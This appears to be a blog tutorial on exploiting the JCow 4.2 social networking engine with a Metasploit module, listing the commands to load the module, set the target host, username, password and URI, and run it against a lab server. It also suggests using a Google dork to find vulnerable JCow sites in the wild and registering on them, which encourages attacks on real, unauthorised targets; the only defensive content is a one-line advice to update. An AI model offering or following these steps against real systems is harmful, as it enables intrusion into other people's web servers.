Type : Tutorial
Level : Medium
Victim Server : Windows XP SP3
Victim vulnerable application : JCow 4.2
Attacker O.S : Backtrack 5 R1
After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".
So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim
Okay I hope you understand what I say above to make it more realistic, let's try the tutorial…
2. Jcow.rb exploit
1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..
If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).
2. Open your Metasploit console and then use the exploit you just added before.
msf > use exploit/remote/jcow
3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).
msf exploit(jcow) > set rhost 192.168.8.94 --> set the target IP rhost => 192.168.8.94 msf exploit(jcow) > set username victim --> set the username username => victim msf exploit(jcow) > set password victim --> set the password password => victim msf exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here uri => jcow
Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.
4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.
1. Update your Jcow Social Networking into > v4.2
Hope you enjoyed…any question?just drop it below..